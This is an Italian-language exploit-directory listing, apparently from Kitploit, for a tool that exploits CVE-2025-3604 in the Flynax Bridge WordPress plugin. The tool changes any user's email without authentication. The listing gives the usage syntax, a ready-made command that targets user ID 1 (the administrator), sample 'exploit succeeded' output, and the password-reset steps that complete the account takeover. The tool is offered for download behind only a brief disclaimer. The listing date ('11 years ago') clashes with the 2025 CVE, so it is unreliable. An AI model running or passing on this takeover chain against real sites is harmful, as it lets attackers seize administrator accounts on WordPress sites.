Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-3604 — Flynax Bridge <= 2.2.0 - Escalation dei privilegi non autenticata tramite account takeover | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-3604
Autenticazione e AutorizzazioneEscalation di PrivilegiAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-3604

CVE-2025-3604

Flynax Bridge <= 2.2.0 - Escalation dei privilegi non autenticata tramite account takeover

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 Flynax Bridge <= 2.2.0 - Escalation dei privilegi non autenticata tramite account takeover

📄 Descrizione

Il plugin Flynax Bridge per WordPress è vulnerabile a escalation dei privilegi tramite account takeover in tutte le versioni fino alla 2.2.0 inclusa.

Ciò è dovuto al fatto che il plugin non convalida correttamente l'identità di un utente prima di aggiornare i dati del suo account (come l'email). Di conseguenza, attaccanti non autenticati possono modificare l'indirizzo email di qualsiasi utente, inclusi gli amministratori, e poi avviare una reimpostazione della password per assumere completamente il controllo dell'account.

CVE: CVE-2025-3604
CVSS: 9.8 (Critico)
Pubblicato: 23 aprile 2025
Ultimo aggiornamento: 24 aprile 2025


⚙️ Esempio di Output dello Script

root@kitploit:~
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited

Dopo lo sfruttamento riuscito, l'attaccante può recarsi nella pagina di accesso di WordPress e cliccare su "Password dimenticata?" usando la nuova email impostata per reimpostare la password e ottenere pieno accesso all'account preso di mira.


🚀 Utilizzo

root@kitploit:~
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL
  -mail, --newmail NEWMAIL
                          New email to set
  -id, --user_id USER_ID  User ID to exploit

🧪 Esempio

root@kitploit:~
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"

Spiegazione:

  • -u: URL di base del sito WordPress.
  • -id: ID dell'utente da colpire (di solito 1 per l'amministratore).
  • -mail: Nuova email che verrà impostata per quell'utente.

⚠️ Disclaimer

Usalo a tuo rischio. Solo per test autorizzati e fini educativi.

🧑‍💻

BY: Nxploited ( Khaled_alenazi )

Scarica lo strumento